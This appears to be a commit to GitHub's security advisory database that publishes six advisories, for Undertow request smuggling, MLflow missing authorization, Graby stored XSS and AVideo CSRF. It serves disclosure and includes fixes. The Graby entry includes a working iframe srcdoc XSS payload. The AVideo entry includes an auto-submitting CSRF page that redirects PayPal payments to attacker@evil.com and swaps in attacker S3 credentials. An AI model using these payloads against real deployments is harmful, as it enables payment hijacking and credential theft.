Publish Advisories

GHSA-3gv6-g396-9v4r
GHSA-3h6j-9x8m-rg3g
GHSA-4wwr-7h7c-chqr
GHSA-8v4x-mgvp-p658
GHSA-g6pg-52vf-843h
GHSA-vqqj-9cmv-hx43

Author: advisory-database[bot]

…-3gv6-g396-9v4r/GHSA-3gv6-g396-9v4r.json …-3gv6-g396-9v4r/GHSA-3gv6-g396-9v4r.jsonadvisories/unreviewed/2026/03/GHSA-3gv6-g396-9v4r/GHSA-3gv6-g396-9v4r.json renamed to advisories/github-reviewed/2026/03/GHSA-3gv6-g396-9v4r/GHSA-3gv6-g396-9v4r.json advisories/unreviewed/2026/03/GHSA-3gv6-g396-9v4r/GHSA-3gv6-g396-9v4r.json renamed to advisories/github-reviewed/2026/03/GHSA-3gv6-g396-9v4r/GHSA-3gv6-g396-9v4r.json

@@ -1,19 +1,40 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-3gv6-g396-9v4r",
-  "modified": "2026-03-27T18:31:27Z",
+  "modified": "2026-03-31T23:13:55Z",
   "published": "2026-03-27T18:31:27Z",
   "aliases": [
     "CVE-2026-28367"
   ],
+  "summary": "Undertow is Vulnerable to HTTP Request/Response Smuggling",
   "details": "A flaw was found in Undertow. A remote attacker can exploit this vulnerability by sending `\\r\\r\\r` as a header block terminator. This can be used for request smuggling with certain proxy servers, such as older versions of Apache Traffic Server and Google Cloud Classic Application Load Balancer, potentially leading to unauthorized access or manipulation of web requests.",
   "severity": [
     {
       "type": "CVSS_V3",
       "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"
     }
   ],
-  "affected": [],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Maven",
+        "name": "io.undertow:undertow-parent"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "2.3.23.Final"
+            }
+          ]
+        }
+      ]
+    }
+  ],
   "references": [
     {
       "type": "ADVISORY",
@@ -26,15 +47,19 @@
     {
       "type": "WEB",
       "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443260"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/undertow-io/undertow"
     }
   ],
   "database_specific": {
     "cwe_ids": [
       "CWE-444"
     ],
     "severity": "HIGH",
-    "github_reviewed": false,
-    "github_reviewed_at": null,
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-31T23:13:55Z",
     "nvd_published_at": "2026-03-27T17:16:27Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-3h6j-9x8m-rg3g/GHSA-3h6j-9x8m-rg3g.json

@@ -0,0 +1,66 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-3h6j-9x8m-rg3g",
+  "modified": "2026-03-31T23:12:36Z",
+  "published": "2026-03-31T23:12:36Z",
+  "aliases": [],
+  "summary": "Graby has stored XSS via iframe srcdoc Attribute in htmLawed Sanitization Config",
+  "details": "## Summary\n\nGraby's `cleanupXss()` function configures htmLawed with conflicting settings: `safe=1` (which removes `<iframe>`) combined with `'elements' => '*+iframe-meta'` (which re-enables `<iframe>`). htmLawed does not sanitize the `srcdoc` attribute, allowing injection of arbitrary JavaScript that executes when the content is rendered via `|raw` in templates.\n\n## Root Cause\n\n**`src/Graby.php` lines 1038-1048:**\n```php\nhtmLawed($html, [\n    'safe' => 1,                    // removes <iframe>\n    'elements' => '*+iframe-meta',  // re-adds <iframe>, overrides safe=1\n    'deny_attribute' => 'style',    // srcdoc is NOT denied\n]);\n```\n\nThe `safe=1` and `+iframe` combination is a conflict: `safe` mode is designed to strip dangerous elements, but the elements override re-enables `<iframe>` without also blocking the dangerous `srcdoc` attribute.\n\n## Proof of Concept\n\nInput to `cleanupXss()`:\n```html\n<iframe srcdoc=\"&lt;script&gt;alert(document.domain)&lt;/script&gt;\"></iframe>\n```\n\nOutput (unchanged — htmLawed passes it through):\n```html\n<iframe srcdoc=\"&lt;script&gt;alert(document.domain)&lt;/script&gt;\"></iframe>\n```\n\nWhen rendered via `{{ content|raw }}` in a template, `srcdoc` executes in an `about:srcdoc` frame with the same origin as the page. **Confirmed via Puppeteer/Chromium headless: `alert(document.domain)` fires.**\n\nValidated on Wallabag (which uses Graby) via Docker: entry created via API with iframe-only content body triggers Readability failure → falls through to `cleanupXss()` path.\n\n## Impact\n\n- Stored XSS in any application rendering Graby-sanitized content via `|raw`\n- In Wallabag: affects both authenticated views and public share pages (unauthenticated)\n- No CSP headers in default Wallabag config — no secondary mitigation\n\n## Suggested Fix\n\nEither remove `+iframe` from the elements config to keep iframes blocked:\n```php\n'elements' => '*-iframe-meta',\n```\n\nOr explicitly deny the `srcdoc` attribute:\n```php\n'deny_attribute' => 'style srcdoc',\n```\n\n## Credit\n\nDiscovered by @tikket1, 2026-03-25. Redirected from wallabag/wallabag advisory by @j0k3r.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "j0k3r/graby"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2.5.1"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 2.5.0"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/j0k3r/graby/security/advisories/GHSA-3h6j-9x8m-rg3g"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/j0k3r/graby/commit/0295d828822f7a59c5751a8199973a4f965a99b0"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/j0k3r/graby"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/j0k3r/graby/releases/tag/2.5.1"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-79"
+    ],
+    "severity": "LOW",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-31T23:12:36Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/03/GHSA-4wwr-7h7c-chqr/GHSA-4wwr-7h7c-chqr.json

@@ -0,0 +1,61 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-4wwr-7h7c-chqr",
+  "modified": "2026-03-31T23:15:25Z",
+  "published": "2026-03-31T23:15:25Z",
+  "aliases": [
+    "CVE-2026-34394"
+  ],
+  "summary": "AVideo's CSRF on Admin Plugin Configuration Enables Payment Credential Hijacking",
+  "details": "## Summary\n\nAVideo's admin plugin configuration endpoint (`admin/save.json.php`) lacks any CSRF token validation. There is no call to `isGlobalTokenValid()` or `verifyToken()` before processing the request. Combined with the application's explicit SameSite=None cookie policy, an attacker can forge cross-origin POST requests from a malicious page to overwrite arbitrary plugin settings on a victim administrator's session.\n\nBecause the `plugins` table is included in the `ignoreTableSecurityCheck()` array in `objects/Object.php`, standard table-level access controls are also bypassed. This allows a complete takeover of platform functionality by reconfiguring payment processors, authentication providers, cloud storage credentials, and more.\n\n## Details\n\nThe session cookie configuration in `objects/include_config.php` at line 135 explicitly weakens the default browser protections:\n\n```php\n// objects/include_config.php:135\nini_set('session.cookie_samesite', 'None');\n```\n\nThis means cookies are attached to all cross-origin requests, making CSRF attacks trivial.\n\nThe save endpoint in `admin/save.json.php` directly processes POST data without any token verification:\n\n```php\n// admin/save.json.php\n$pluginName = $_POST['pluginName'];\n$pluginValues = $_POST;\n// ...\n$pluginDO->$key = $pluginValues[$key];\n$p->setObject_data(json_encode($pluginDO));\n$p->save();\n```\n\nThe `plugins` table is explicitly exempted from security checks in `objects/Object.php` at line 529:\n\n```php\n// objects/Object.php:529\nstatic function ignoreTableSecurityCheck() {\n    return ['plugins', /* ... other tables ... */];\n}\n```\n\nEven the ORM-level protections that exist for other tables do not apply to plugin configuration writes.\n\n## Proof of Concept\n\nHost the following HTML on an attacker-controlled domain. When a logged-in AVideo administrator visits this page, their PayPal receiver email is silently changed to the attacker's address:\n\n```html\n<!DOCTYPE html>\n<html>\n<head><title>Loading...</title></head>\n<body>\n<form id=\"csrf\" method=\"POST\" action=\"https://your-avideo-instance.com/admin/save.json.php\">\n    <input type=\"hidden\" name=\"pluginName\" value=\"PayPerView\" />\n    <input type=\"hidden\" name=\"paypalReceiverEmail\" value=\"attacker@evil.com\" />\n</form>\n<script>\n    document.getElementById('csrf').submit();\n</script>\n</body>\n</html>\n```\n\nTo overwrite S3 storage credentials instead:\n\n```html\n<form id=\"csrf\" method=\"POST\" action=\"https://your-avideo-instance.com/admin/save.json.php\">\n    <input type=\"hidden\" name=\"pluginName\" value=\"AWS_S3\" />\n    <input type=\"hidden\" name=\"region\" value=\"us-east-1\" />\n    <input type=\"hidden\" name=\"bucket\" value=\"attacker-bucket\" />\n    <input type=\"hidden\" name=\"key\" value=\"ATTACKER_KEY_ID\" />\n    <input type=\"hidden\" name=\"secret\" value=\"ATTACKER_SECRET\" />\n</form>\n```\n\nReproduction steps:\n\n1. Log in to AVideo as an administrator.\n2. In a separate browser tab, open the attacker's HTML page.\n3. The form auto-submits, overwriting the target plugin configuration.\n4. Verify the change by navigating to the plugin settings page in the admin panel.\n\n## Impact\n\nAn attacker can silently reconfigure any plugin on the AVideo platform by tricking an administrator into visiting a malicious page. Exploitable configurations include:\n\n- **Payment hijacking**: Change PayPal receiver email or Stripe keys to redirect all payments to the attacker.\n- **Credential theft**: Replace S3 bucket credentials so uploaded media is sent to attacker-controlled storage.\n- **Authentication bypass**: Modify LDAP/OAuth plugin settings to point at attacker-controlled identity providers.\n- **Backdoor installation**: Enable and configure plugins to introduce persistent access.\n\nThis is a full platform takeover with zero user interaction beyond a single page visit.\n\n- **CWE**: CWE-352 (Cross-Site Request Forgery)\n\n## Recommended Fix\n\nAdd CSRF token validation at `admin/save.json.php:10`, immediately after the admin check:\n\n```php\n// admin/save.json.php:10\nif (!isGlobalTokenValid()) {\n    die('{\"error\":\"Invalid CSRF token\"}');\n}\n```\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "wwbn/avideo"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "26.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-4wwr-7h7c-chqr"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34394"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/WWBN/AVideo"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-352"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-31T23:15:25Z",
+    "nvd_published_at": "2026-03-31T21:16:30Z"
+  }
+}

…-8v4x-mgvp-p658/GHSA-8v4x-mgvp-p658.json …-8v4x-mgvp-p658/GHSA-8v4x-mgvp-p658.jsonadvisories/unreviewed/2026/03/GHSA-8v4x-mgvp-p658/GHSA-8v4x-mgvp-p658.json renamed to advisories/github-reviewed/2026/03/GHSA-8v4x-mgvp-p658/GHSA-8v4x-mgvp-p658.json advisories/unreviewed/2026/03/GHSA-8v4x-mgvp-p658/GHSA-8v4x-mgvp-p658.json renamed to advisories/github-reviewed/2026/03/GHSA-8v4x-mgvp-p658/GHSA-8v4x-mgvp-p658.json

@@ -1,19 +1,40 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-8v4x-mgvp-p658",
-  "modified": "2026-03-27T18:31:27Z",
+  "modified": "2026-03-31T23:14:15Z",
   "published": "2026-03-27T18:31:27Z",
   "aliases": [
     "CVE-2026-28368"
   ],
+  "summary": "Undertow is Vulnerable to HTTP Request/Response Smuggling",
   "details": "A flaw was found in Undertow. This vulnerability allows a remote attacker to construct specially crafted requests where header names are parsed differently by Undertow compared to upstream proxies. This discrepancy in header interpretation can be exploited to launch request smuggling attacks, potentially bypassing security controls and accessing unauthorized resources.",
   "severity": [
     {
       "type": "CVSS_V3",
       "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"
     }
   ],
-  "affected": [],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Maven",
+        "name": "io.undertow:undertow-parent"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "2.3.23.Final"
+            }
+          ]
+        }
+      ]
+    }
+  ],
   "references": [
     {
       "type": "ADVISORY",
@@ -26,15 +47,19 @@
     {
       "type": "WEB",
       "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443261"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/undertow-io/undertow"
     }
   ],
   "database_specific": {
     "cwe_ids": [
       "CWE-444"
     ],
     "severity": "HIGH",
-    "github_reviewed": false,
-    "github_reviewed_at": null,
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-31T23:14:15Z",
     "nvd_published_at": "2026-03-27T17:16:27Z"
   }
 }

…-g6pg-52vf-843h/GHSA-g6pg-52vf-843h.json …-g6pg-52vf-843h/GHSA-g6pg-52vf-843h.jsonadvisories/unreviewed/2026/03/GHSA-g6pg-52vf-843h/GHSA-g6pg-52vf-843h.json renamed to advisories/github-reviewed/2026/03/GHSA-g6pg-52vf-843h/GHSA-g6pg-52vf-843h.json advisories/unreviewed/2026/03/GHSA-g6pg-52vf-843h/GHSA-g6pg-52vf-843h.json renamed to advisories/github-reviewed/2026/03/GHSA-g6pg-52vf-843h/GHSA-g6pg-52vf-843h.json

@@ -1,24 +1,53 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-g6pg-52vf-843h",
-  "modified": "2026-03-27T18:31:27Z",
+  "modified": "2026-03-31T23:13:28Z",
   "published": "2026-03-27T18:31:27Z",
   "aliases": [
     "CVE-2025-15381"
   ],
+  "summary": "MLFlow allows Tracing + Assessments Access",
   "details": "In the latest version of mlflow/mlflow, when the `basic-auth` app is enabled, tracing and assessment endpoints are not protected by permission validators. This allows any authenticated user, including those with `NO_PERMISSIONS` on the experiment, to read trace information and create assessments for traces they should not have access to. This vulnerability impacts confidentiality by exposing trace metadata and integrity by allowing unauthorized creation of assessments. Deployments using `mlflow server --app-name=basic-auth` are affected.",
   "severity": [
     {
       "type": "CVSS_V3",
       "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
     }
   ],
-  "affected": [],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "mlflow"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "3.8.1"
+            }
+          ]
+        }
+      ]
+    }
+  ],
   "references": [
     {
       "type": "ADVISORY",
       "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15381"
     },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/mlflow/mlflow"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/mlflow/mlflow/blob/b569ebc74c14af593c326143bee2df44a5d59edf/mlflow/server/auth/__init__.py#L752"
+    },
     {
       "type": "WEB",
       "url": "https://huntr.com/bounties/149fb2f9-ef4b-4136-a25c-20563451904c"
@@ -29,8 +58,8 @@
       "CWE-200"
     ],
     "severity": "HIGH",
-    "github_reviewed": false,
-    "github_reviewed_at": null,
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-31T23:13:28Z",
     "nvd_published_at": "2026-03-27T17:16:26Z"
   }
 }

…-vqqj-9cmv-hx43/GHSA-vqqj-9cmv-hx43.json …-vqqj-9cmv-hx43/GHSA-vqqj-9cmv-hx43.jsonadvisories/unreviewed/2026/03/GHSA-vqqj-9cmv-hx43/GHSA-vqqj-9cmv-hx43.json renamed to advisories/github-reviewed/2026/03/GHSA-vqqj-9cmv-hx43/GHSA-vqqj-9cmv-hx43.json advisories/unreviewed/2026/03/GHSA-vqqj-9cmv-hx43/GHSA-vqqj-9cmv-hx43.json renamed to advisories/github-reviewed/2026/03/GHSA-vqqj-9cmv-hx43/GHSA-vqqj-9cmv-hx43.json

@@ -1,19 +1,40 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-vqqj-9cmv-hx43",
-  "modified": "2026-03-27T18:31:27Z",
+  "modified": "2026-03-31T23:14:40Z",
   "published": "2026-03-27T18:31:27Z",
   "aliases": [
     "CVE-2026-28369"
   ],
+  "summary": "Undertow is Vulnerable to HTTP Request/Response Smuggling",
   "details": "A flaw was found in Undertow. When Undertow receives an HTTP request where the first header line starts with one or more spaces, it incorrectly processes the request by stripping these leading spaces. This behavior, which violates HTTP standards, can be exploited by a remote attacker to perform request smuggling. Request smuggling allows an attacker to bypass security mechanisms, access restricted information, or manipulate web caches, potentially leading to unauthorized actions or data exposure.",
   "severity": [
     {
       "type": "CVSS_V3",
       "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"
     }
   ],
-  "affected": [],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Maven",
+        "name": "io.undertow:undertow-parent"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "2.3.23.Final"
+            }
+          ]
+        }
+      ]
+    }
+  ],
   "references": [
     {
       "type": "ADVISORY",
@@ -26,15 +47,19 @@
     {
       "type": "WEB",
       "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443262"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/undertow-io/undertow"
     }
   ],
   "database_specific": {
     "cwe_ids": [
       "CWE-444"
     ],
     "severity": "HIGH",
-    "github_reviewed": false,
-    "github_reviewed_at": null,
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-31T23:14:40Z",
     "nvd_published_at": "2026-03-27T17:16:28Z"
   }
 }